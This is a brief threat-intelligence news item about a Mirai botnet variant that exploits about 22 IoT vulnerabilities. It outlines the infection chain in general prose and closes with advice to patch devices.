Go to listing page

Mirai Variant Targets Multiple IoT Vulnerabilities in Recent Campaign

Mirai Variant Targets Multiple IoT Vulnerabilities in Recent Campaign
Since March 2023, threat actors have been found exploiting several IoT vulnerabilities to distribute a variant of the Mirai botnet. According to Palo Alto Unit 42 Networks researchers, these vulnerabilities are being leveraged to gain complete control over devices to execute additional attacks, such as DDoS attacks. 

More details

The latest spotted Mirai botnet variant has been identified in two ongoing campaigns that started on March 14 and spiked in April and June.
  • The variant targets around 22 known security issues in various connected products such as routers, DVRs, NVRs, WiFi communication dongles, thermal monitoring systems, access control systems, and solar power generation monitors. 
  • Some of these affected products are from D-Link, Nagios, Arris, Zyxel, TP-Link, SolarView, Nortek, Tenda, and MediaTek.

Infection chain

  • The attack chain commences by exploiting one of these flaws, laying the groundwork for executing a shell script from an external resource. 
  • This script downloads the botnet client that matches the architectures of a compromised device, such as armv4l, arm5l, arm6l, arm7l, mips, mipsel, sh4, x86_64, i686, i586, arc, m68k, and sparc.
  • After execution of the bot client, the shell script downloader deletes the client’s file infection tracks to reduce the likelihood of detection.

Mirai-inspired botnets continue to grow in the wild

  • Recently, the Shadowserver Foundation cited active exploitation of a command injection flaw in Zyxel gear by a Mirai-like botnet.
  • Another variant, dubbed IZ1H9, was found in large-scale network attacks targeting servers and networking devices running Linux. 
  • In February, a Mirai variant, tracked as V3G4, exploited 13 different vulnerabilities in three different campaigns to launch massive DDoS attacks.

Ending lines

The widespread abuse of IoT devices continues to persist as researchers uncover botnet variants, especially from Mirai. Given the rising popularity of this botnet and its variants among the threat actors, it is advised that organizations must take necessary precautions to secure their devices by applying the latest security patches as soon as possible.
Cyware Publisher

Publisher

Cyware